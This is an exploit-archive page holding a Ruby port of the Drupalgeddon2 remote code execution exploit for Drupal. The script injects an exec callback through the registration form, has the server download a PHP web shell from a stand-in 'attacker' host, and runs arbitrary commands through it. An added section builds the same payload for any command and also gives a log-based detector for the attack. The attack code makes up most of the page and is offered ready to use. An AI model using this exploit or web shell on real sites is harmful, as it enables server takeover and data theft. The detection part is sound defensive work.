Drupal Drupalgeddon2 Remote Code Execution (Ruby)

2018.04.13
Credit: Hans Topo
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

require 'net/http'
require 'uri'
require 'openssl'

# Hans Topo ruby port from Drupalgeddon2 exploit.
# Based on Vitalii Rudnykh exploit.
#
# Usage: ruby drupalgeddon2.rb http://target 'id'
#
# Stage 1 sends a Form API render array through the user-registration AJAX
# endpoint (Drupalgeddon2, CVE-2018-7600): mail[#post_render][]=exec makes
# Drupal call exec() on mail[#markup], here a wget that drops a PHP shell
# into the web root. Stage 2 calls that shell with ?cmd=<command>.

target  = ARGV[0]
command = ARGV[1]
abort "Usage: #{$PROGRAM_NAME} <http(s)://target> <command>" unless target && command

url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'

# Serve this file at shell_url; wget saves it under its basename in the
# directory Drupal runs from (the web root).
shell     = "<?php system($_GET['cmd']); ?>"
shell_url = 'http://attacker/shell.php'
dropped   = File.basename(shell_url)

# Form body. Only the keys and values are percent-encoded; the '=' and '&'
# separators must stay literal or PHP sees the whole body as one parameter.
payload = URI.encode_www_form(
  'mail[#markup]'        => "wget #{shell_url}",
  'mail[#type]'          => 'markup',
  'form_id'              => 'user_register_form',
  '_drupal_ajax'         => '1',
  'mail[#post_render][]' => 'exec'
)

uri  = URI(url)
http = Net::HTTP.new(uri.host, uri.port)
if uri.scheme == 'https'
  http.use_ssl     = true
  http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end

# request_uri keeps the query string; uri.path alone would drop the
# element_parents/ajax_form parameters the vulnerable code path needs.
req = Net::HTTP::Post.new(uri.request_uri)
req['Content-Type'] = 'application/x-www-form-urlencoded'
req.body = payload
response = http.request(req)

if response.code != '200'
  puts '[*] Response: ' + response.code
  puts '[*] Target seems not to be exploitable'
  exit
end
puts '[*] Target seems to be exploitable.'

# Stage 2: run the command through the dropped shell.
exploit_uri = URI("#{target}/#{dropped}?cmd=#{URI.encode_www_form_component(command)}")
response = Net::HTTP.get_response(exploit_uri)
puts response.body
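Added example, not part of the original exploit or of Drupal: the Ruby below builds the same render-array body for an arbitrary command (the exploit above hardcodes one wget) and, on the defensive side, flags the request patterns of this exploit in an access log. The test it applies is the one the SA-CORE-2018-002 fix introduced in Drupal's RequestSanitizer, which strips any request key starting with '#' before the Form API sees it; the log lines, IP addresses and paths are constructed for the example.

```ruby
require 'uri'

# --- Building the request body ------------------------------------------
# Drupal's Form API treats any array key starting with '#' as a render-array
# property. '#post_render' is a list of callables applied to '#markup', so
# injecting both through user input makes the renderer call exec(cmd).
# build_payload generalises the exploit's single 'wget ...' body to any cmd.
def build_payload(cmd)
  URI.encode_www_form(
    'mail[#markup]'        => cmd,
    'mail[#type]'          => 'markup',
    'form_id'              => 'user_register_form',
    '_drupal_ajax'         => '1',
    'mail[#post_render][]' => 'exec'
  )
end

# Split a PHP-style nested parameter name such as "mail[#post_render][]"
# into its segments: ["mail", "#post_render", ""].
def param_segments(name)
  [name[/\A[^\[]*/]] + name.scan(/\[([^\]]*)\]/).flatten
end

# Every '#'-prefixed key segment in a URL-encoded query string or form body.
# This is the check the patched RequestSanitizer applies before dropping such
# keys; on an unpatched site they reach the renderer untouched.
def render_array_keys(encoded)
  URI.decode_www_form(encoded.to_s)
     .flat_map { |k, _| param_segments(k) }
     .select   { |seg| seg.start_with?('#') }
     .uniq
end

# --- Detection over web-server access logs --------------------------------
# Indicators per request line:
#   1. a query-string key carrying a '#' render-array property, or
#   2. element_parents pointing at a '#' property of a form element, which is
#      the /user/register?element_parents=account/mail/#value request above.
# POST bodies are normally not logged, so indicator 1 only fires on GET
# variants; indicator 2 is what catches the exploit's exact request.
REQUEST_RE = %r{"(?:GET|POST|PUT|PATCH|HEAD|OPTIONS) (\S+) HTTP/[\d.]+"}

def drupalgeddon2_indicators(target)
  query   = URI(target).query.to_s
  reasons = []
  keys = render_array_keys(query)
  reasons << "render-array property in request keys: #{keys.join(', ')}" unless keys.empty?
  URI.decode_www_form(query).each do |k, v|
    next unless k == 'element_parents'
    hashed = v.split('/').select { |seg| seg.start_with?('#') }
    reasons << "element_parents targets #{hashed.join('/')}" unless hashed.empty?
  end
  reasons
rescue URI::InvalidURIError
  []
end

# Returns [[line_number, [reasons...]], ...] for every flagged request.
def flag_log_lines(log)
  log.each_line.with_index(1).filter_map do |line, n|
    m = REQUEST_RE.match(line) or next
    reasons = drupalgeddon2_indicators(m[1])
    [n, reasons] unless reasons.empty?
  end
end

# Constructed sample log (combined format); hosts and timestamps are made up.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [13/Apr/2018:10:01:02 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 512
  10.0.0.6 - - [13/Apr/2018:10:01:03 +0000] "GET /user/register HTTP/1.1" 200 8120
  10.0.0.7 - - [13/Apr/2018:10:01:04 +0000] "GET /node?mail%5B%23post_render%5D%5B%5D=exec HTTP/1.1" 200 100
LOG

if __FILE__ == $PROGRAM_NAME
  puts "body for 'id': #{build_payload('id')}"
  puts "injected properties: #{render_array_keys(build_payload('id')).join(' ')}"
  flag_log_lines(SAMPLE_LOG).each { |n, why| puts "line #{n}: #{why.join('; ')}" }
end
```

The detector deliberately keys on the '#'-prefixed property names rather than on the literal strings of this one exploit, since the same render-array injection works through other form elements and other callables than exec; a site running the fixed release returns nothing to the renderer for such keys, so a hit in the log is a probe regardless of whether it succeeded.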


Copyright 2018, cxsecurity.com

 
